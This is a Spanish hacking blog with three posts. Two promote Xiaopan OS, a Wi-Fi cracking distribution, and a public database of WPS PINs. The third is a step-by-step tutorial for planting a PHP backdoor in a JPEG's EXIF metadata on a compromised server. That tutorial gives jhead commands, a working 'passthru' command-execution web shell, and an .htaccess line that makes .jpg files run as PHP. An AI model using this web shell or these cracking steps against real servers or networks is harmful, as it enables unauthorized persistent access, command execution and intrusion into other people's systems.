jueves, 8 de agosto de 2013

[Wifi] Xiaopan OS


Xiaopan OS es un sistema operativo basado en linux (concretamente en TCL), con software muy facil de usar y con herramientas avanzadas e ideales para penetrar redes wifi basadas en WPA, WPA2, WPS Y WEP.




Tambien dispone de una interfaz grafica muy intuitiva que nos ahorra el tener que escribir comandos por consola.
Otro de sus puntos fuertes es el pequeño tamaño (~70MB), que nos permite tenerlo en cualquier pen drive y bootearlo desde ahi. Ademas Xiaopan OS es compatible con Windows, Mac y Linux.

Captura de pantalla del entorno:

Una pequeña demostracion de uno de sus usos:




Alguna de las herramientas incluidas:

- Inflator
- Aircrack-ng
- Minidwep GTK
- XFE
- Wifite
- Feeding Bottle
- Reaver


Es compatible con casi todos los modelos de tarjetas de red actuales.

Si os habeis decidido a instalarlo o a usarlo, lo que os recomiendo es que utilicéis alguna herramienta como LiLi (http://www.linuxliveusb.com/), para bootear o instalar desde usb, ya que es muy intuitivo su uso y reduce el tiempo que invertir.

Por ultimo el enlace al proyecto:
http://sourceforge.net/projects/xiaopanos/

viernes, 22 de febrero de 2013

[WPSdb] Base de datos de pines WPS


WPSdb es un sitio que recauda información interesante sobre pines de WPS (Wifi Protected Setup) de redes WIFI, creando una base de datos accesible para cualquier usuario. Puedes realizar busquedas según la dirección MAC, agregar más pines, etc. Actualmente hay mas de 500 pines disponibles en la base de datos y todos de acceso libre.

Screenshots:

Enlace al sitio:
WPSdb

Más informacion sobre WPS:

+Info

jueves, 19 de abril de 2012

Ocultando codigo PHP en los metadatos de un JPG

Resulta sencillo usar los metadatos EXIF de una imagen JPEG para ocultar código PHP, por ejemplo para dejar un backdoor en la imagen de nuestro avatar en un servidor ya comprometido.


Existen varias herramientas para manipular los metadatos EXIF. Entre todos ellos una de las mejores herramientas para esto es jhead. Para empezar seleccionamos nuestra imagen JPG y miramos sus metadatos con jhead:

C:\>jhead h33z.jpg
File name    : h33z.jpg
File size    : 71384 bytes
File date    : 2012:04:17 14:31:40
Resolution   : 492 x 369
Para insertar nuestro código PHP introducimos:

C:\>jhead -ce h33z.jpg

A continuación se introduce el código PHP que queramos ocultar como por ejemplo:

  • "<?php passthru($_POST['cmd']); __halt_compiler();" -> El cual nos permite ejecutar un comando a la maquina con peticiones POST gracias a la funcion passthru.
Una vez que hemos ocultado el código en la imagen, tendremos que forzar que el servidor web maneje un fichero jpg como si fuera un fichero php. Para ello añadiremos AddType en el fichero .htaccess del directorio de las imágenes. Como ejemplo:

C:\>echo AddType application/x-httpd-php .jpg >> d:\htdocs\server\images\.htaccess

Una vez hecho esto tendremos nuestra imagen ejecutando el código PHP sin problemas.
Esta técnica serviría en un servidor ya comprometido en el cual pudiéramos modificar el fichero .htaccess para que  nuestro JPG ejecutara código.

Enlace de descarga jhead: http://www.sentex.net/~mwandel/jhead/